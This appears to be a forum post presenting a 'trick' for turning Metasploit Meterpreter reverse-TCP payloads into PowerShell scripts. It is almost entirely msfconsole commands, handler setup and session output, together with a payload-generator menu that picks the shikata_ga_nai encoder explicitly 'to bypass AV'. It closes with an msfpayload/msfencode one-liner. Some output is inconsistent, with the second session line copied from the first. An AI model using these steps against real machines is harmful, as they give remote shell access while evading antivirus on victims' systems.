this is a nice little trick to generate meterpreter in to powershell in msf
msf exploit(handler) > use windows/x64/meterpreter/reverse_tcp
msf payload(reverse_tcp) > generate -t psh -f /var/www/pwShell.ps1
[-] Payload generation failed: The following options failed to validate: LHOST.
msf payload(reverse_tcp) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf payload(reverse_tcp) > set LPORT 5555
LPORT => 5555
msf payload(reverse_tcp) > generate -t psh -f /var/www/pwShell.ps1
[*] Writing 3620 bytes to /var/www/pwShell.ps1...
msf payload(reverse_tcp) > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.108:5555
[*] Starting the payload handler...
[*] Meterpreter session 1 closed. Reason: Died
[*] Sending stage (951296 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.108:5555 -> 192.168.1.103:56300) at 2012-12-10 10:40:26 +0000
and an easyway to make the powershell payloads:
root@bt:~/u3-pwn/resource/powershell_scripts# python powershellgen.py
What payload do you want to generate:
Name: Description:
----- ------------
1. Windows Shell Reverse_TCP Windows Command Shell, Reverse TCP Stager
2. Windows Reverse_TCP Meterpreter Windows Meterpreter (Reflective Injection), Reverse TCP Stager
3. Windows Reverse_TCP VNC DLL VNC Server (Reflective Injection), Reverse TCP Stager
4. Windows Bind Shell Windows Command Shell, Bind TCP Stager
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows x64 Command Shell, Windows x64 Reverse TCP Stager
7. Windows Meterpreter Reverse_TCP X64 Windows x64 Meterpreter, Windows x64 Reverse TCP Stager
8. Windows Meterpreter Reverse HTTPS Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
9. Windows Meterpreter Reverse DNS Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
Enter number: 2
What encoder would you like to try and bypass AV with.
Name: Description:
----- -----------
1. avoid_utf8_tolower Avoid UTF8/tolower
2. shikata_ga_nai Polymorphic XOR Additive Feedback Encoder
3. alpha_mixed Alpha2 Alphanumeric Mixedcase Encoder
4. alpha_upper Alpha2 Alphanumeric Uppercase Encoder
5. call4_dword_xor Call+4 Dword XOR Encoder
6. countdown Single-byte XOR Countdown Encoder
7. fnstenv_mov Variable-length Fnstenv/mov Dword XOR Encoder
8. jmp_call_additive Jump/Call XOR Additive Feedback Encoder
9. nonalpha Non-Alpha Encoder
10. nonupper Non-Upper Encoder
11. unicode_mixed Alpha2 Alphanumeric Unicode Mixedcase Encoder
12. unicode_upper Alpha2 Alphanumeric Unicode Uppercase Encoder
Enter number: 2
Please Enter Ip addr: 192.168.1.108
Please Enter A Port No: 4444
Generating Shellcode Please Wait...
Do you want to start a listener to receive the payload yes or no: yes
Starting Listener....
[*] Please wait while we load the module tree...
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
|______________________________________________________________________________|
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.108
LPORT => 4444
[*] Started reverse handler on 192.168.1.108:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] Meterpreter session 1 opened (192.168.1.108:5555 -> 192.168.1.103:56300) at 2012-12-10 10:40:26 +0000still working on the code since the trouble of working out the encoding in base64 in python as it has bad chars in conversion.
EDIT:
the encoding is in base64 but has some chars replaced as they become null chars when converted. you can use
ps_encoder.py also to add msf encoders to the powershell script.
you can use
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R msfencode -e <encoder> -t psh > out.ps1
